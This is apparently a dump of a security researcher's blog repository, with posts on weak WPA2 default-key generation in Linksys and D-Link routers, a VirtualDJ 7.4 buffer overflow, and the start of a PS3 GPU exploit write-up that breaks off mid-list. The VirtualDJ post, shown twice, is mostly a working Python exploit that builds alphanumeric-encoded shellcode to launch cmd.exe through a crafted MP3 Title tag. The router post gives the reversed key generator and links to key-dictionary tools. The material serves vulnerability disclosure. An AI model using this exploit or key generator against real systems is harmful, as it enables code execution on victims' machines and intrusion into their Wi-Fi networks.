 24 |                 position: absolute;
 25 |                 right: 0;
 26 |             }
 27 | 
 28 |             .post-key {
 29 |                 background-color: hsl(45, 67%, 80%);
 30 |                 border-radius: 5px 0px 0px 5px;
 31 |                 padding: 2px 6px 2px 8px;
 32 |                 margin: 0px;
 33 |             }
 34 |             .post-val {
 35 |                 background-color: hsl(45, 67%, 90%);
 36 |                 border-radius: 0px 5px 5px 0px;
 37 |                 padding: 2px 8px 2px 6px;
 38 |                 margin: 0px;
 39 |             }
 40 | 
 41 |             footer {
 42 |                 text-align: center;
 43 |             }
 44 |         
 45 |             @media (max-width: 767px) {
 46 |                 body {
 47 |                     padding: 15px;
 48 |                 }
 49 |             }
 50 |         </style>
 51 |     </head>
 52 |     <body class="markdown-body">
 53 |         <header>
 54 |             <div class="links">
 55 |                 <span>
 56 |                     <a href="https://twitter.com/AlexAltea">Twitter</a> |
 57 |                     <a href="https://github.com/AlexAltea">Github</a> |
 58 |                     <a href="mailto:alexandro@phi.nz">Email</a>
 59 |                 </span>
 60 |             </div>
 61 |             <span><a href="../../">&lt; Other articles</a></span>
 62 |         </header>
 63 |         <article>
 64 |             <h1>WPA2 Key Generation Vulnerability: Linksys / D-Link</h1>
 65 |             <p>
 66 |                 <span 
 67 |                     class="post-key">Author</span><span
 68 |                     class="post-val">Alexandro Sanchez</span>
 69 |                 <span
 70 |                     class="post-key">Date</span><span
 71 |                     class="post-val">2013-03-31</span>
 72 |             </p>
 73 |             <p>After finding the <a href="../2013-03-08-wpa2-vulnerability-tplink/">TP-Link WPA2 Key Generation Vulnerability</a>, I reverse-engineered assistants provided by other vendors. It turns out that some Linksys and D-Link routers generate their default WPA2 keys with algorithms nearly identical to those used by TP-Link routers. For more information about this vulnerability and its consequences, please refer to the report linked above, as redundant information will be omitted here.</p>
 74 | <p>This time, the vulnerability affects the <strong>Linksys EasyLink Advisor</strong> and <strong>D-Link Quick Setup Wizard</strong> assistants, both based on <em>Network Magic</em>, software created by Pure Networks, a company belonging to Cisco/Linksys. Since Pure Networks actually sold their software to third parties, e.g. D-Link, other assistants might be affected as well.</p>
 75 | <p>The reversed generator is:</p>
 76 | <div class="codehilite"><pre><span></span><span class="n">blacklist_windows</span> <span class="o">=</span> <span class="s2">&quot;1I2Z0O5SUV&quot;</span>
 77 | <span class="n">blacklist_macosx</span>  <span class="o">=</span> <span class="s2">&quot;B8DO0I1S5UVZ2&quot;</span>
 78 | <span class="n">blacklist</span> <span class="o">=</span> <span class="n">blacklist_windows</span>  <span class="c1"># Change me</span>
 79 | 
 80 | <span class="k">def</span> <span class="nf">gen</span><span class="p">(</span><span class="n">seed</span><span class="p">):</span>
 81 |     <span class="n">key</span> <span class="o">=</span> <span class="s2">&quot;&quot;</span>
 82 |     <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">10</span><span class="p">):</span>
 83 |         <span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
 84 |             <span class="n">seed</span> <span class="o">=</span> <span class="p">((</span><span class="n">seed</span> <span class="o">*</span> <span class="mh">0x343FD</span><span class="p">)</span> <span class="o">+</span> <span class="mh">0x269EC3</span><span class="p">)</span> <span class="o">%</span> <span class="p">(</span><span class="mi">2</span><span class="o">**</span><span class="mi">32</span><span class="p">)</span>
 85 |             <span class="n">edx</span> <span class="o">=</span> <span class="p">((</span><span class="n">seed</span> <span class="o">&gt;&gt;</span> <span class="mh">0x10</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0x7FFF</span><span class="p">)</span> <span class="o">%</span> <span class="mh">0x24</span>
 86 |             <span class="k">if</span> <span class="n">edx</span> <span class="o">&gt;=</span> <span class="mh">0xA</span><span class="p">:</span>
 87 |                 <span class="n">edx</span> <span class="o">+=</span> <span class="mh">0x37</span>
 88 |             <span class="k">else</span><span class="p">:</span>
 89 |                 <span class="n">edx</span> <span class="o">+=</span> <span class="mh">0x30</span>
 90 |             <span class="k">if</span> <span class="nb">chr</span><span class="p">(</span><span class="n">edx</span><span class="p">)</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">blacklist</span><span class="p">:</span>
 91 |                 <span class="n">key</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(</span><span class="n">edx</span><span class="p">)</span>
 92 |                 <span class="k">break</span>
 93 |     <span class="k">return</span> <span class="n">key</span>
 94 | </pre></div>
 95 | 
 96 | 
 97 | <p>The seeds used by this function are obtained in exactly the same way as in the TP-Link assistant. The only difference this time is that rather than pseudorandomly choosing characters from a <em>whitelist</em>, it adds random characters in the range <code>[0-9A-Z]</code>, filtering out those found in a hardcoded <em>blacklist</em>, meant to prevent adding visually similar characters such as '<code>0</code>' and '<code>O</code>' to the key.</p>
 98 | <p>As explained in the TP-Link vulnerability report, the low entropy can be exploited to bruteforce the key in a matter of minutes with a powerful GPU or hours with a CPU.</p>
 99 | <h2 id="affected-routers">Affected routers</h2>
100 | <p>The complete list of affected Linksys routers is:</p>
101 | <ul>
102 | <li>WAP610N (Blacklisted characters on Windows assistant: <code>"1I2Z0O5SUVB8"</code>)</li>
103 | <li>WRT110</li>
104 | <li>WRT120N</li>
105 | <li>WRT160N (V1, V2, V3)</li>
106 | <li>WRT160N-HP (V1*)</li>
107 | <li>WRT160NL</li>
108 | <li>WRT310N (V1, V2)</li>
109 | <li>WRT320N</li>
110 | <li>WRT400N</li>
111 | <li>WRT54G2</li>
112 | <li>WRT610N (V1*, V2)</li>
113 | </ul>
114 | <p>The complete list of affected D-Link routers is:</p>
115 | <ul>
116 | <li>DGL-4100</li>
117 | <li>DGL-4300</li>
118 | <li>DIR-615 (not all revisions)</li>
119 | <li>DIR-625</li>
120 | <li>DIR-635</li>
121 | <li>WBR-1310</li>
122 | <li>WBR-1310 Rev. B</li>
123 | <li>WBR-2310</li>
124 | </ul>
125 | <h2 id="resources">Resources</h2>
126 | <ul>
127 | <li><strong>Linksys-CheckKeys</strong>: Check if your key is vulnerable to this attack, i.e., find whether your key is in the set of keys generated by all possible seeds. Download: <a href="http://www.mediafire.com/download.php?pmqt9aykwxhwkto">http://www.mediafire.com/download.php?pmqt9aykwxhwkto</a>.</li>
128 | <li><strong>Linksys-GenSeeds</strong>: This tool calculates the seed interval from the given time interval in which the router might have been installed. Download: <a href="http://www.mediafire.com/download.php?kpe7844kqd9bk4j">http://www.mediafire.com/download.php?kpe7844kqd9bk4j</a>.</li>
129 | <li><strong>Linksys-GenKeys</strong>: Generate a key dictionary by specifying a seed interval. Download: <a href="http://www.mediafire.com/download.php?2h9y0pkay9id1rt">http://www.mediafire.com/download.php?2h9y0pkay9id1rt</a>.</li>
130 | </ul>
131 | <h2 id="solutions">Solutions</h2>
132 | <ul>
133 | <li>Do not use seeds at all. Feed the results of a cryptographically secure PRNG such as <code>/dev/urandom</code> on Unix-like systems as indices of the character array modulo its length. This is for instance what the Linksys E4200 WLAN routers do: the indices of the key character array are provided by <code>CryptGenRandom</code> in <code>Advapi32.dll</code>.</li>
134 | <li>If for some reason you want to use seeds for generating keys:</li>
135 | <li>Make them bigger than 32-bit. Just 2^32 keys are easy to check.</li>
136 | <li>Obtain them from a cryptographically secure PRNG.</li>
137 | <li>If you still want to obtain them from the system time, use fine-grained time units (e.g. elapsed time in nanoseconds rather than seconds) to minimize the number of bits an attacker can guess. </li>
138 | </ul>
139 |         </article>
140 |         <hr>
141 |         <footer>
142 |             <p>
143 |                 Questions? Comments? <a href="https://github.com/AlexAltea/blog/issues">Open an issue!</a>
144 |             </p>
145 |             <p><a href="mailto:alexandro@phi.nz">alexandro@phi.nz</a></p>
146 |         </footer>
147 |     </body>
148 | </html>
149 | 


--------------------------------------------------------------------------------
/posts/2013-04-20-virtualdj-74-buffer-overflow/_main.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout: post
 3 | date: 2013-04-20
 4 | title: VirtualDJ Pro/Home 7.4: Buffer Overflow
 5 | author: Alexandro Sanchez
 6 | ---
 7 | 
 8 | I have found a buffer overflow vulnerability in [VirtualDJ Pro 7.4 and VirtualDJ Home 7.4](http://www.virtualdj.com/) and possibly previous versions of this software. After right-clicking a file and entering the "_File Infos_" > "_Cover..._" menu, VirtualDJ tries to find a cover for the given file on Google Images and stores the request URL in a buffer which looks like: `"http://images.google.com/images?q=X"` where `X` corresponds to the ID3 tag _Title_. Special characters of this tag are ignored, and any sequence of symbols (e.g. `' '`, `'-'`, `'_'`) is replaced with `'+'`. The problem is [once again](../2013-03-30-virtualdj-73-buffer-overflow/) that VirtualDJ does not check if the information stored in the ID3 tags is too big to fit in the buffer.
 9 | 
10 | To exploit this vulnerability, I searched for a `call esp` instruction stored at an address that could be represented with alphanumeric characters, and found one at `0x444D4C64`, that is, `"dLMD"`. After entering this call, all the bytes after the _Fake Title_ + _Spaces_ + _Padding_ + `"dLMD"` will be executed. Since we can only use alphanumeric characters, we have to encode the shellcode and decode it at execution time using only bytes in the range `[0-9A-Za-z]`. For this purpose I used a function from [ALPHA3](http://code.google.com/p/alpha3/). After that, the original shellcode will be decoded and executed.
11 | 
12 | ```python
13 | #Exploit: VirtualDJ Pro/Home <=7.4 Buffer Overflow Vulnerability 
14 | #By: Alexandro Sanchez Bach | functionmixer.blogspot.com 
15 | #More info: http://www.youtube.com/watch?v=Yini294AR2Q 
16 | 
17 | def encodeData(decoder, data, validValues):
18 |     assert data.find("\0") == -1, "Shellcode must be NULL free"
19 |     data += "\0" #End of shellcode 
20 |     encData = decoder[-2:]
21 |     decoder = decoder[:-2]
22 |     for p in range(len(data)):
23 |         dByte = ord(data[p])
24 |         pxByte = ord(encData[p+1])
25 |         bx, by = encoder(dByte ^ pxByte, validValues)
26 |         encData += chr(bx) + chr(by)
27 |     return decoder + encData
28 |  
29 | def encoder(value, validValues): 
30 |       for bx in validValues:
31 |         imul = (bx * 0x30) & 0xFF
32 |         for by in validValues:
33 |             if imul ^ by == value: return [bx, by]
34 |  
35 | 
36 | #Shellcode (e.g. run cmd.exe) 
37 | shellcode  = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC"
38 | shellcode += "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45"
39 | shellcode += "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45"
40 | shellcode += "\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45"
41 | shellcode += "\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3"
42 | retAddress = "\xED\x1E\x94\x7C" # jmp ESP ntdll.dll WinXP SP2 
43 | shellcode += retAddress
44 | 
45 | #Arguments 
46 | fakeTitle  = "Greatest Hits of the Internet - Nyan Cat"
47 | while fakeTitle[0]  == " ": fakeTitle = fakeTitle[1:]
48 | while fakeTitle[-1] == " ": fakeTitle = fakeTitle[:-1]
49 | for i in fakeTitle:
50 |     if i not in "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz -":
51 |         raise "Invalid characters in the fake title"
52 | fakeTitle2 = fakeTitle.replace("-"," ")
53 | while "  " in fakeTitle2: fakeTitle2 = fakeTitle2.replace("  "," ")
54 | 
55 | #Exploit 
56 | exploit =  fakeTitle + " "*1024 + "1"*(1026 - len(fakeTitle2)-1)
57 | exploit += "dLMD" #RETN address 
58 | exploit += "XXAI" #ESP := Baseaddr of encoded payload 
59 | exploit += encodeData(
60 | 	"TYhffffk4diFkDql02Dqm0D1CuEE", #Baseaddr of encoded payload := ESP 
61 |     shellcode,
62 |     map(ord, list("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"))
63 | )
64 | 
65 | print exploit
66 | #Paste the generated code in the tag 'Title' of the MP3 file.
67 | ```
68 | 
69 | You can see a demo of this proof of concept at: <https://www.youtube.com/watch?v=Yini294AR2Q>.
70 | 
71 | ## Log
72 | 
73 | * __2013-04-07__: Bug discovered. VirtualDJ was emailed about this a few days later.
74 | * __2013-04-20__: Bug ignored. Exploit published.
75 | 


--------------------------------------------------------------------------------
/posts/2013-04-20-virtualdj-74-buffer-overflow/index.html:
--------------------------------------------------------------------------------
  1 | <!-- This file has been auto-generated! -->
  2 | <!DOCTYPE html>
  3 | <html>
  4 |     <head>
  5 |         <meta charset="utf-8">
  6 |         <meta name="viewport" content="width=device-width, initial-scale=1">
  7 |         <title>VirtualDJ Pro/Home 7.4: Buffer Overflow</title>
  8 |         <!-- Style -->
  9 |         <link rel="stylesheet" href="../../css/code.css">
 10 |         <link rel="stylesheet" href="../../css/markdown.css">
 11 |         <style>
 12 |             body {
 13 |                 box-sizing: border-box;
 14 |                 min-width: 200px;
 15 |                 max-width: 980px;
 16 |                 margin: 0 auto;
 17 |                 padding: 45px;
 18 |             }
 19 | 
 20 |             header {
 21 |                 position: relative;
 22 |             }
 23 |             header > .links {
 24 |                 position: absolute;
 25 |                 right: 0;
 26 |             }
 27 | 
 28 |             .post-key {
 29 |                 background-color: hsl(45, 67%, 80%);
 30 |                 border-radius: 5px 0px 0px 5px;
 31 |                 padding: 2px 6px 2px 8px;
 32 |                 margin: 0px;
 33 |             }
 34 |             .post-val {
 35 |                 background-color: hsl(45, 67%, 90%);
 36 |                 border-radius: 0px 5px 5px 0px;
 37 |                 padding: 2px 8px 2px 6px;
 38 |                 margin: 0px;
 39 |             }
 40 | 
 41 |             footer {
 42 |                 text-align: center;
 43 |             }
 44 |         
 45 |             @media (max-width: 767px) {
 46 |                 body {
 47 |                     padding: 15px;
 48 |                 }
 49 |             }
 50 |         </style>
 51 |     </head>
 52 |     <body class="markdown-body">
 53 |         <header>
 54 |             <div class="links">
 55 |                 <span>
 56 |                     <a href="https://twitter.com/AlexAltea">Twitter</a> |
 57 |                     <a href="https://github.com/AlexAltea">Github</a> |
 58 |                     <a href="mailto:alexandro@phi.nz">Email</a>
 59 |                 </span>
 60 |             </div>
 61 |             <span><a href="../../">&lt; Other articles</a></span>
 62 |         </header>
 63 |         <article>
 64 |             <h1>VirtualDJ Pro/Home 7.4: Buffer Overflow</h1>
 65 |             <p>
 66 |                 <span 
 67 |                     class="post-key">Author</span><span
 68 |                     class="post-val">Alexandro Sanchez</span>
 69 |                 <span
 70 |                     class="post-key">Date</span><span
 71 |                     class="post-val">2013-04-20</span>
 72 |             </p>
 73 |             <p>I have found a buffer overflow vulnerability in <a href="http://www.virtualdj.com/">VirtualDJ Pro 7.4 and VirtualDJ Home 7.4</a> and possibly previous versions of this software. After right-clicking a file and entering the "<em>File Infos</em>" &gt; "<em>Cover...</em>" menu, VirtualDJ tries to find a cover for the given file on Google Images and stores the request URL in a buffer which looks like: <code>"http://images.google.com/images?q=X"</code> where <code>X</code> corresponds to the ID3 tag <em>Title</em>. Special characters of this tag are ignored, and any sequence of symbols (e.g. <code>' '</code>, <code>'-'</code>, <code>'_'</code>) is replaced with <code>'+'</code>. The problem is <a href="../2013-03-30-virtualdj-73-buffer-overflow/">once again</a> that VirtualDJ does not check if the information stored in the ID3 tags is too big to fit in the buffer.</p>
 74 | <p>To exploit this vulnerability, I searched for a <code>call esp</code> instruction stored in an address that could be represented with alphanumeric characters, I found such instruction in 0x444D4C64, that is, <code>"dLMD"</code>. After entering this call, all the bytes after the <em>Fake Title</em> + <em>Spaces</em> + <em>Padding</em> + <code>"dLMD"</code> will be executed. Since we can only use alphanumeric characters, we have to encode the shellcode and decode it in execution time using only bytes in range <code>[0-9A-Za-z]</code>. For this purpose I used a function from <a href="http://code.google.com/p/alpha3/">ALPHA3</a>. After that, the original shellcode will be decoded and executed.</p>
 75 | <div class="codehilite"><pre><span></span><span class="c1">#Exploit: VirtualDJ Pro/Home &lt;=7.4 Buffer Overflow Vulnerability </span>
 76 | <span class="c1">#By: Alexandro Sanchez Bach | functionmixer.blogspot.com </span>
 77 | <span class="c1">#More info: http://www.youtube.com/watch?v=Yini294AR2Q </span>
 78 | 
 79 | <span class="k">def</span> <span class="nf">encodeData</span><span class="p">(</span><span class="n">decoder</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">validValues</span><span class="p">):</span>
 80 |     <span class="k">assert</span> <span class="n">data</span><span class="o">.</span><span class="n">find</span><span class="p">(</span><span class="s2">&quot;</span><span class="se">\0</span><span class="s2">&quot;</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="s2">&quot;Shellcode must be NULL free&quot;</span>
 81 |     <span class="n">data</span> <span class="o">+=</span> <span class="s2">&quot;</span><span class="se">\0</span><span class="s2">&quot;</span> <span class="c1">#End of shellcode </span>
 82 |     <span class="n">encData</span> <span class="o">=</span> <span class="n">decoder</span><span class="p">[</span><span class="o">-</span><span class="mi">2</span><span class="p">:]</span>
 83 |     <span class="n">decoder</span> <span class="o">=</span> <span class="n">decoder</span><span class="p">[:</span><span class="o">-</span><span class="mi">2</span><span class="p">]</span>
 84 |     <span class="k">for</span> <span class="n">p</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">)):</span>
 85 |         <span class="n">dByte</span> <span class="o">=</span> <span class="nb">ord</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="n">p</span><span class="p">])</span>
 86 |         <span class="n">pxByte</span> <span class="o">=</span> <span class="nb">ord</span><span class="p">(</span><span class="n">encData</span><span class="p">[</span><span class="n">p</span><span class="o">+</span><span class="mi">1</span><span class="p">])</span>
 87 |         <span class="n">bx</span><span class="p">,</span> <span class="n">by</span> <span class="o">=</span> <span class="n">encoder</span><span class="p">(</span><span class="n">dByte</span> <span class="o">^</span> <span class="n">pxByte</span><span class="p">,</span> <span class="n">validValues</span><span class="p">)</span>
 88 |         <span class="n">encData</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(</span><span class="n">bx</span><span class="p">)</span> <span class="o">+</span> <span class="nb">chr</span><span class="p">(</span><span class="n">by</span><span class="p">)</span>
 89 |     <span class="k">return</span> <span class="n">decoder</span> <span class="o">+</span> <span class="n">encData</span>
 90 | 
 91 | <span class="k">def</span> <span class="nf">encoder</span><span class="p">(</span><span class="n">value</span><span class="p">,</span> <span class="n">validValues</span><span class="p">):</span> 
 92 |       <span class="k">for</span> <span class="n">bx</span> <span class="ow">in</span> <span class="n">validValues</span><span class="p">:</span>
 93 |         <span class="n">imul</span> <span class="o">=</span> <span class="p">(</span><span class="n">bx</span> <span class="o">*</span> <span class="mh">0x30</span><span class="p">)</span> <span class="o">&amp;</span><span class="n">amp</span><span class="p">;</span> <span class="mh">0xFF</span>
 94 |         <span class="k">for</span> <span class="n">by</span> <span class="ow">in</span> <span class="n">validValues</span><span class="p">:</span>
 95 |             <span class="k">if</span> <span class="n">imul</span> <span class="o">^</span> <span class="n">by</span> <span class="o">==</span> <span class="n">value</span><span class="p">:</span> <span class="k">return</span> <span class="p">[</span><span class="n">bx</span><span class="p">,</span> <span class="n">by</span><span class="p">]</span>
 96 | 
 97 | 
 98 | <span class="c1">#Shellcode (e.g. run cmd.exe) </span>
 99 | <span class="n">shellcode</span>  <span class="o">=</span> <span class="s2">&quot;</span><span class="se">\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC</span><span class="s2">&quot;</span>
100 | <span class="n">shellcode</span> <span class="o">+=</span> <span class="s2">&quot;</span><span class="se">\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45</span><span class="s2">&quot;</span>
101 | <span class="n">shellcode</span> <span class="o">+=</span> <span class="s2">&quot;</span><span class="se">\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45</span><span class="s2">&quot;</span>
102 | <span class="n">shellcode</span> <span class="o">+=</span> <span class="s2">&quot;</span><span class="se">\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45</span><span class="s2">&quot;</span>
103 | <span class="n">shellcode</span> <span class="o">+=</span> <span class="s2">&quot;</span><span class="se">\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3</span><span class="s2">&quot;</span>
104 | <span class="n">retAddress</span> <span class="o">=</span> <span class="s2">&quot;</span><span class="se">\xED\x1E\x94\x7C</span><span class="s2">&quot;</span> <span class="c1"># jmp ESP ntdll.dll WinXP SP2 </span>
105 | <span class="n">shellcode</span> <span class="o">+=</span> <span class="n">retAddress</span>
106 | 
107 | <span class="c1">#Arguments </span>
108 | <span class="n">fakeTitle</span>  <span class="o">=</span> <span class="s2">&quot;Greatest Hits of the Internet - Nyan Cat&quot;</span>
109 | <span class="k">while</span> <span class="n">fakeTitle</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>  <span class="o">==</span> <span class="s2">&quot; &quot;</span><span class="p">:</span> <span class="n">fakeTitle</span> <span class="o">=</span> <span class="n">fakeTitle</span><span class="p">[</span><span class="mi">1</span><span class="p">:]</span>
110 | <span class="k">while</span> <span class="n">fakeTitle</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="s2">&quot; &quot;</span><span class="p">:</span> <span class="n">fakeTitle</span> <span class="o">=</span> <span class="n">fakeTitle</span><span class="p">[:</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
111 | <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">fakeTitle</span><span class="p">:</span>
112 |     <span class="k">if</span> <span class="n">i</span> <span class="ow">not</span> <span class="ow">in</span> <span class="s2">&quot;0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz -&quot;</span><span class="p">:</span>
113 |         <span class="k">raise</span> <span class="s2">&quot;Invalid characters in the fake title&quot;</span>
114 | <span class="n">fakeTitle2</span> <span class="o">=</span> <span class="n">fakeTitle</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">&quot;-&quot;</span><span class="p">,</span><span class="s2">&quot; &quot;</span><span class="p">)</span>
115 | <span class="k">while</span> <span class="s2">&quot; &quot;</span> <span class="ow">in</span> <span class="n">fakeTitle2</span><span class="p">:</span> <span class="n">fakeTitle2</span> <span class="o">=</span> <span class="n">fakeTitle2</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">&quot; &quot;</span><span class="p">,</span><span class="s2">&quot; &quot;</span><span class="p">)</span>
116 | 
117 | <span class="c1">#Exploit </span>
118 | <span class="n">exploit</span> <span class="o">=</span>  <span class="n">fakeTitle</span> <span class="o">+</span> <span class="s2">&quot; &quot;</span><span class="o">*</span><span class="mi">1024</span> <span class="o">+</span> <span class="s2">&quot;1&quot;</span><span class="o">*</span><span class="p">(</span><span class="mi">1026</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="n">fakeTitle2</span><span class="p">)</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>
119 | <span class="n">exploit</span> <span class="o">+=</span> <span class="s2">&quot;dLMD&quot;</span> <span class="c1">#RETN address </span>
120 | <span class="n">exploit</span> <span class="o">+=</span> <span class="s2">&quot;XXAI&quot;</span> <span class="c1">#ESP := Baseaddr of encoded payload </span>
121 | <span class="n">exploit</span> <span class="o">+=</span> <span class="n">encodeData</span><span class="p">(</span>
122 |     <span class="s2">&quot;TYhffffk4diFkDql02Dqm0D1CuEE&quot;</span><span class="p">,</span> <span class="c1">#Baseaddr of encoded payload := ESP </span>
123 |     <span class="n">shellcode</span><span class="p">,</span>
124 |     <span class="nb">map</span><span class="p">(</span><span class="nb">ord</span><span class="p">,</span> <span class="nb">list</span><span class="p">(</span><span class="s2">&quot;0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz&quot;</span><span class="p">))</span>
125 | <span class="p">)</span>
126 | 
127 | <span class="k">print</span> <span class="n">exploit</span>
128 | <span class="c1">#Paste the generated code in the tag &#39;Title&#39; of the MP3 file.</span>
129 | </pre></div>
130 | 
131 | 
132 | <p>You can see a demo of this proof of concept at: https://www.youtube.com/watch?v=Yini294AR2Q.</p>
133 | <h2 id="log">Log</h2>
134 | <ul>
135 | <li><strong>2013-04-07</strong>: Bug discovered. VirtualDJ was emailed about this a few days later.</li>
136 | <li><strong>2013-04-20</strong>: Bug ignored. Exploit published.</li>
137 | </ul>
138 |         </article>
139 |         <hr>
140 |         <footer>
141 |             <p>
142 |                 Questions? Comments? <a href="https://github.com/AlexAltea/blog/issues">Open an issue!</a>
143 |             </p>
144 |             <p><a href="mailto:alexandro@phi.nz">alexandro@phi.nz</a></p>
145 |         </footer>
146 |     </body>
147 | </html>
148 | 


--------------------------------------------------------------------------------
/posts/2016-03-16-ps3-gpu-exploit/_main.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | layout: post
  3 | date: 2016-03-16
  4 | title: PS3 GPU Full VRAM/IO access exploit
  5 | author: Alexandro Sanchez
  6 | ---
  7 | 
  8 | ## Introduction
  9 | 
 10 | During the early development of the PlayStation 3 emulator project [Nucleus](https://github.com/AlexAltea/nucleus), it was decided to do a high-level emulation of the PlayStation 3 kernel known as CellOS Lv-2, often shortened to *LV2*. This implied reverse engineering and reimplementing the kernel, and intercepting the syscalls used by user-mode applications. The correct reimplementation of a certain group of syscalls, the kernel-level RSX driver interface with prefix `sys_rsx`, was crucial to the success of the GPU emulation. Additionally, these syscalls are a thin wrapper around the actual hypervisor-level RSX driver, accessible through the `lv1_gpu` syscalls.
 11 | 
 12 | Between February 2016 and March 2016, the developer *@3141card* reverse engineered the RSX driver code found in both layers. These sources, combined with the documentation and headers from the [Envytools](https://github.com/envytools/envytools)/[Nouveau](https://nouveau.freedesktop.org) projects and advice from *@mwk* eased the security analysis, resulting in the vulnerability presented here.
 13 | 
 14 | ## Reality Synthesizer
 15 |  
 16 | The Reality Synthesizer, commonly shortened to RSX, is the PlayStation 3 GPU and is composed of multiple engines. Gross over-simplifications take place throughout this section for the sake of readability. RSX exposes 3 Base Address Registers (BARs):
 17 | 
 18 | | BAR    | Offset          | Size    | Description |
 19 | |--------|-----------------|---------|-------------|
 20 | | *BAR0* | `0x28000000000` | 32 MB   | MMIO        |
 21 | | *BAR1* | `0x28080000000` | 256 MB  | VRAM        |
 22 | | *BAR2* | `0x28002000000` | *???*   | RAMIN       |
 23 | 
 24 | While *BAR0* points to the MMIO register area, both *BAR1* and *BAR2* map to the same 256 MB DDR memory. The difference is that BAR2 offsets are reversed, starting from the end of the VRAM and going to the beginning in chunks of 512 KB. The following formulas can be used to convert a BAR1 offset into a BAR2 offset and vice versa:
 25 | 
 26 | ```cpp
 27 | uint32_t addr_vram_to_pramin(uint32_t offset) {
 28 |     uint32_t vram_size = 0x10000000; // 256 MB
 29 |     uint32_t rev_size = 0x80000; // 512 KB
 30 |     return (offset - vram_size) ^ -rev_size;
 31 | }
 32 | 
 33 | uint32_t addr_ramin_to_vram(uint32_t offset) {
 34 |     uint32_t vram_size = 0x10000000; // 256 MB
 35 |     uint32_t rev_size = 0x80000; // 512 KB
 36 |     return vram_size - (offset - (offset % rev_size)) - rev_size + (offset % rev_size);
 37 | }
 38 | ```
 39 | 
 40 | The driver fills RAMIN with objects which can be either *Engine objects* or *DMA objects*, commonly known as *FIFO objects*. The former describe engines that do a particular task (e.g. 2D graphics, 3D graphics, memory copying, etc.), while the latter describe a DMA-accessible location.
 41 | 
 42 | Certain methods require a DMA object in order to know which data to access. Rather than directly passing the RAMIN offset to the engine, the driver populates a hash table known as *RAMHT*, which maps a unique handler to the RAMIN offset where the target DMA object is located.
 43 | 
 44 | The DMA objects contain information about the access type, the range size and starting offset. Taking into account the IO segments mapped by LV1, a DMA object can reference the following offsets:
 45 | 
 46 | | Offset                      | Description       |
 47 | |-----------------------------|-------------------|
 48 | | `0x00000000` - `0x0FFFFFFF` | VRAM              |
 49 | | `0x80000000` - `0x8FFFFFFF` | IOMMU (Context 0) |
 50 | | `0x90000000` - `0x9FFFFFFF` | IOMMU (Context 1) |
 51 | 
 52 | ## Exploit
 53 | 
 54 | ### RSX MMIO register mapping
 55 |  
 56 | The LV2 kernel provides the following syscall:
 57 |  
 58 | ```cpp
 59 | // LV2 SysCall 675 (0x2A3)
 60 | uint64_t sys_rsx_device_map(uint64_t mmio_addr, uint64_t vram_addr, uint64_t device_id);
 61 | ```
 62 |  
 63 | The table below lists the RSX devices that can be mapped through this syscall. The highlighted entries correspond to the devices involved in the vulnerability:
 64 |  
 65 | | Device |   MMIO         |   VRAM           |   Description   | Control |
 66 | |--------|----------------|------------------|-----------------|---------|
 67 | |    5   |   `0x08A000`   |   `----------`   |                 |   No    |
 68 | |    6   |   `0x200000`   |   `----------`   |   PMEDIA        |   No    |
 69 | |    7   |   `0x600000`   |   `----------`   |   PCRTC         |   No    |
 70 | |    8   |   `--------`   |   `0x0FF10000`   |                 |   No    |
 71 | |    9   |   `0x400000`   |   `----------`   |   PGRAPH        |   Yes   |
 72 | |   10   |   `0x100000`   |   `----------`   |   PFB           |   Yes   |
 73 | |   11   |   `0x00A000`   |   `----------`   |   PCOUNTER      |   Yes   |
 74 | |   12   |   `0x680000`   |   `----------`   |                 |   Yes   |
 75 | |   13   |   `0x090000`   |   `----------`   |                 |   Yes   |
 76 | | __14__ | __`0x002000`__ | __`----------`__ | __PFIFO__       | __Yes__ |
 77 | |   15   |   `0x088000`   |   `----------`   |   IOIF          |   Yes   |
 78 |  
 79 | By mapping device 14, we can access the PFIFO MMIO registers from the userland code (or LV2 if `ss.param.fself.control` prevents us from doing that and the EEPROM cannot be patched). Among the many PFIFO registers listed in the Nouveau headers and documents, some of them struck me as particularly dangerous if misused. These registers are described below:
 80 | 
 81 | * `0x002140` *NV03_PFIFO_INTR_EN_0*: Disable the interrupts that trigger LV1 panics.
